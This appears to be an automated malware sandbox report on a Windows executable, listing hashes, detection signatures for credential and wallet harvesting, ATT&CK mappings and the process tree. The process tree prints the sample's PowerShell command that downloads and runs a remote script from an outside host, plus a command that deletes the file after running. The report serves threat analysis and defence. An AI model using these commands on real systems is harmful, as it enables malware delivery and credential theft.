Analysis

  • max time kernel
    128s
  • max time network
    133s
  • platform
    windows10-1703_x64
  • resource
    win10-20230915-en
  • resource tags

    arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
  • submitted
    15-09-2023 13:04

General

  • Target

    c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe

  • Size

    247KB

  • MD5

    f17afa21e88b7a362db5ae8fdfa43de9

  • SHA1

    14b024dfe1f9aa6eb88bc7e2215e4877c92cc01e

  • SHA256

    c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf

  • SHA512

    efbdcd1c0fb91cb15de2935ed500fb0f9a8b3ef1491e9823850e97451348cd3a170bc0ad3c84086438508f7280f100a33ff8299a7de64093129b2d7ea83b8e0d

  • SSDEEP

    3072:98iTSP3d1hp5xnAs03vx54qylRs8crPGjl5mS3qI79TPJvLCw8DSmfNKgAiNNrc4:90zl37r79h2DSm1SgAOmhzN+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://aszfiltration.com/storage/files/debug2.ps1

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe
    "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:392
    • C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3340
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:656
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe" >> NUL
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:200
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:3692

Network

MITRE ATT&CK Matrix ATT&CK v13

Credential Access

Unsecured Credentials

2
T1552

Credentials In Files

2
T1552.001

Discovery

System Information Discovery

1
T1082

Remote System Discovery

1
T1018

Collection

Data from Local System

2
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_acbup1dj.sdu.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • memory/656-4-0x000002BE5E720000-0x000002BE5E742000-memory.dmp
    Filesize

    136KB

  • memory/656-5-0x00007FF8EDC60000-0x00007FF8EE64C000-memory.dmp
    Filesize

    9.9MB

  • memory/656-6-0x000002BE76A30000-0x000002BE76A40000-memory.dmp
    Filesize

    64KB

  • memory/656-7-0x000002BE76A30000-0x000002BE76A40000-memory.dmp
    Filesize

    64KB

  • memory/656-10-0x000002BE76BC0000-0x000002BE76C36000-memory.dmp
    Filesize

    472KB

  • memory/656-32-0x000002BE76A30000-0x000002BE76A40000-memory.dmp
    Filesize

    64KB

  • memory/656-39-0x000002BE769F0000-0x000002BE76A04000-memory.dmp
    Filesize

    80KB

  • memory/656-40-0x000002BE76A00000-0x000002BE76A1C000-memory.dmp
    Filesize

    112KB

  • memory/656-41-0x000002BE76C40000-0x000002BE76C90000-memory.dmp
    Filesize

    320KB

  • memory/656-215-0x00007FF8EDC60000-0x00007FF8EE64C000-memory.dmp
    Filesize

    9.9MB